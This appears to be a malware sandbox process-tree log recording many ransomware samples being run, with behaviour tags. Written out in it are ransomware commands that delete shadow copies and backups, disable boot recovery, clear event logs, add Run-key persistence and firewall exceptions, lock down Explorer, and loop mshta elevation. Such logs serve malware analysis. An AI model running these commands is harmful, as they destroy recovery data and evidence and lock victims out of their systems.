C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 16524⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 15124⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 28684⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 15524⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 22564⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14844⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14684⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 10964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 22564⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 10964⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14764⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14444⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14484⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14764⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14364⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14444⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 14484⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 15324⤵
-
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Generic-f899ae2fc984188f6cd13d1eca7b031f58f8b6be5a47e023daf340bd850de229.exeHEUR-Trojan-Ransom.Win32.Generic-f899ae2fc984188f6cd13d1eca7b031f58f8b6be5a47e023daf340bd850de229.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v DisableRegistryTools /d 1 /f4⤵
- Modifies registry key
-
-
-
C:\Users\Admin\Desktop\00397\HEUR-Trojan-Ransom.Win32.Stop.gen-6057a2c0e48a6f692d5ef8a36dad893899fd7dcb03067b2729ebe4b04d867357.exeHEUR-Trojan-Ransom.Win32.Stop.gen-6057a2c0e48a6f692d5ef8a36dad893899fd7dcb03067b2729ebe4b04d867357.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\b3796345-43f3-4055-8ec1-44ab2060a969" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Blocker.mqfc-1d82e60080a0deb2543e7f5a015b4be0ddb6f5f4768ace5c314607ff5ad8fab3.exeTrojan-Ransom.Win32.Blocker.mqfc-1d82e60080a0deb2543e7f5a015b4be0ddb6f5f4768ace5c314607ff5ad8fab3.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Roaming\Security Center.exe"C:\Users\Admin\AppData\Roaming\Security Center.exe"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Security Center.exe" "Security Center.exe" ENABLE5⤵
- Modifies Windows Firewall
-
-
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Blocker.mqkq-c164ba38bef4d67b7bc51aacaf06edec1f6d1f97207aaf3539d72ba1630d4f87.exeTrojan-Ransom.Win32.Blocker.mqkq-c164ba38bef4d67b7bc51aacaf06edec1f6d1f97207aaf3539d72ba1630d4f87.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\TempMicrosoft.exe"C:\Users\Admin\AppData\Local\TempMicrosoft.exe"4⤵
-
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Encoder.cya-24d70038e548e6e1322e5922587d803f181a5a0d8ba95a1a264caa93ccc664a7.exeTrojan-Ransom.Win32.Encoder.cya-24d70038e548e6e1322e5922587d803f181a5a0d8ba95a1a264caa93ccc664a7.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\Admin\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Encoder.cya-24d70038e548e6e1322e5922587d803f181a5a0d8ba95a1a264caa93ccc664a7.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\ctfmon.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Alternative User Input" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\ctfmon.exe\" *"4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Alternative User Input" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\ctfmon.exe\" *"5⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\ctfmon.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\ctfmon.exe" *4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:05⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete backup5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f5⤵
- Clears Network RDP Connection History and Configurations
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f6⤵
- Clears Network RDP Connection History and Configurations
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f5⤵
- Clears Network RDP Connection History and Configurations
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f6⤵
- Clears Network RDP Connection History and Configurations
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h5⤵
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\documents\Default.rdp" -s -h6⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application5⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe clear-log Application6⤵
- Clears Windows event logs
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security5⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe clear-log Security6⤵
- Clears Windows event logs
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System5⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe clear-log System6⤵
- Clears Windows event logs
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled5⤵
-
C:\Windows\SysWOW64\sc.exesc config eventlog start=disabled6⤵
- Launches sc.exe
-
-
-
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Encoder.kvo-c750f7953c86ed18fb1b74a77aac0026129022a502a50fe1ca9b81f336ce1d26.exeTrojan-Ransom.Win32.Encoder.kvo-c750f7953c86ed18fb1b74a77aac0026129022a502a50fe1ca9b81f336ce1d26.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Gen.das-8befe0dde3fe13d15c5078e435c1c0bd68cda94986ed17ec3af4959e60c6c58f.exeTrojan-Ransom.Win32.Gen.das-8befe0dde3fe13d15c5078e435c1c0bd68cda94986ed17ec3af4959e60c6c58f.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Gen.rea-4ae06a5c16f58ffc6f39e4d5195484f5be8f90eef26afbdaec45f80e8d14c0b6.exeTrojan-Ransom.Win32.Gen.rea-4ae06a5c16f58ffc6f39e4d5195484f5be8f90eef26afbdaec45f80e8d14c0b6.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\~8ECE.bat Trojan-Ransom.Win32.Gen.rea-4ae06a5c16f58ffc6f39e4d5195484f5be8f90eef26afbdaec45f80e8d14c0b6.exe4⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t reg_dword /d 1 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t reg_dword /d 4 /f5⤵
-
-
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Gen.yrv-c96924ee2b3c45ea30868e3765f7dacebf2981356e2665ca856257d0b5f85186.exeTrojan-Ransom.Win32.Gen.yrv-c96924ee2b3c45ea30868e3765f7dacebf2981356e2665ca856257d0b5f85186.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\00397\Trojan-Ransom.Win32.Zerber.gcve-e3f3b0ff21d8be48ecd7dc96b282f14ad94ab712a03c5f4e04cdbfb2d401ca8d.exeTrojan-Ransom.Win32.Zerber.gcve-e3f3b0ff21d8be48ecd7dc96b282f14ad94ab712a03c5f4e04cdbfb2d401ca8d.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 2324⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 2364⤵
- Program crash
-
-
-
C:\Users\Admin\Desktop\00397\UDS-Trojan-Ransom.Win32.Petr.atn-e0790af279238c85b255391a0f4e2fbbbde20905dddc44b54f7b18d057e31f1a.exeUDS-Trojan-Ransom.Win32.Petr.atn-e0790af279238c85b255391a0f4e2fbbbde20905dddc44b54f7b18d057e31f1a.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CDS.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CDS.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\crypted.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\crypted.exe"5⤵
-
-
-
-
C:\Users\Admin\Desktop\00397\VHO-Trojan-Ransom.Win32.Convagent.gen-c6bb071495ce80f0b5f0ea4d5dab9db6f28c27cc4a068186d41153fcc30b7a90.exeVHO-Trojan-Ransom.Win32.Convagent.gen-c6bb071495ce80f0b5f0ea4d5dab9db6f28c27cc4a068186d41153fcc30b7a90.exe3⤵
-
-
C:\Users\Admin\Desktop\00397\VHO-Trojan-Ransom.Win32.Encoder.gen-d0572013ae3ae9ba1f021ebcb15a7fecf2f16561971d96239fdadad2af6a2db3.exeVHO-Trojan-Ransom.Win32.Encoder.gen-d0572013ae3ae9ba1f021ebcb15a7fecf2f16561971d96239fdadad2af6a2db3.exe3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E8E4.tmp\E8E5.tmp\E8E6.bat C:\Users\Admin\Desktop\00397\VHO-Trojan-Ransom.Win32.Encoder.gen-d0572013ae3ae9ba1f021ebcb15a7fecf2f16561971d96239fdadad2af6a2db3.exe"4⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"5⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"5⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F0C4.tmp\F0C5.tmp\F0C6.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"7⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"8⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"8⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F4FA.tmp\F4FB.tmp\F4FC.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"10⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"11⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"11⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"12⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F95F.tmp\F960.tmp\F961.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"13⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"14⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"14⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"15⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FCCA.tmp\FCCB.tmp\FCCC.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"16⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"17⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"17⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"18⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FF79.tmp\FF7A.tmp\FF7B.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"19⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"20⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"20⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"21⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\371.tmp\372.tmp\373.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"22⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"23⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"23⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"24⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7E6.tmp\7E7.tmp\7E8.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"25⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"26⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"26⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"27⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FB6.tmp\FB7.tmp\FB8.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"28⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"29⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"29⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"30⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\17F3.tmp\17F4.tmp\17F5.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"31⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"32⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"32⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"33⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1CB6.tmp\1CB7.tmp\1CB8.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"34⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"35⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"35⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"36⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2244.tmp\2245.tmp\2246.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"37⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"38⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"38⤵
- Access Token Manipulation: Create Process with Token
-
C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"39⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\287D.tmp\287E.tmp\287F.bat C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE"40⤵
-
C:\Windows\system32\reg.exereg.exe query "HKU\S-1-5-19"41⤵
-
-
C:\Windows\system32\mshta.exemshta "vbscript:CreateObject("Shell.Application").ShellExecute("C:\Users\Admin\Desktop\00397\VHO-TR~2.EXE", "", "", "runas", 1) & Close()"41⤵
- Access Token Manipulation: Create Process with Token
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2960 -ip 29601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5420 -ip 54201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5420 -ip 54201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4676 -ip 46761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4676 -ip 46761⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
